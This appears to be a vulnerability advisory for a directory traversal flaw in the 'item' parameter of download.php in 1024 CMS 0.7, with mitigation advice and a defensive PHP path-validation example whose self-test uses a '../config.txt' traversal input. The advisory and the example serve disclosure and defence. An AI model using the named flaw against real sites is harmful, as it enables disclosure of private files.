vendor: 1024 CMS
by: Dj7xpl
CVSS: N/A
MEDIUM
Remote File Disclosure
CWE: 22
Product Name: 1024 CMS
Affected Version From: 0.7
Affected Version To: 0.7
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Remote File Disclosure Vulnerability in 1024 CMS Version 0.7
The vulnerability allows an attacker to disclose sensitive files on the target system. By manipulating the 'item' parameter in the 'download.php' script, an attacker can traverse directories and access files outside the intended directory.
Mitigation:
The vendor should release a patch that validates user input and prevents directory traversal attacks. Additionally, access controls should be implemented to restrict access to sensitive files.
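The input validation described above can be done by canonicalizing the requested path and checking that it stays inside the download directory. The following is an added example, not code from 1024 CMS or its vendor; DOWNLOAD_DIR, its path and resolve_download() are hypothetical names chosen for illustration, and only the 'item' parameter comes from the advisory.

```php
<?php
// Added example, not 1024 CMS code. DOWNLOAD_DIR and resolve_download()
// are hypothetical names; the storage path is an assumption.
const DOWNLOAD_DIR = '/var/www/site/downloads';

// Map a user-supplied item name to a file inside $baseDir.
// Returns the canonical path, or null when the request must be refused.
function resolve_download(string $item, string $baseDir): ?string
{
    if ($item === '' || strpos($item, "\0") !== false) {
        return null;                      // empty name or embedded NUL byte
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses '.', '..' and symlinks; false if nothing exists there.
    $target = realpath($base . DIRECTORY_SEPARATOR . $item);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator, so a sibling such as
    // "downloads-old" cannot pass as being inside "downloads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

if (PHP_SAPI !== 'cli') {
    $item = $_GET['item'] ?? '';
    $path = is_string($item) ? resolve_download($item, DOWNLOAD_DIR) : null;
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($path)));
    readfile($path);
} else {
    // Command-line self-check on constructed sample files.
    $root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . getmypid();
    mkdir($root . '/downloads', 0700, true);
    file_put_contents($root . '/downloads/manual.txt', 'public');
    file_put_contents($root . '/config.txt', 'private');
    foreach (['manual.txt', '../config.txt', 'missing.txt'] as $name) {
        $ok = resolve_download($name, $root . '/downloads') !== null;
        echo str_pad($name, 16), $ok ? 'served' : 'refused', PHP_EOL;
    }
}
```

The check runs on the resolved path rather than on the raw string, so it does not depend on filtering particular character sequences out of the parameter.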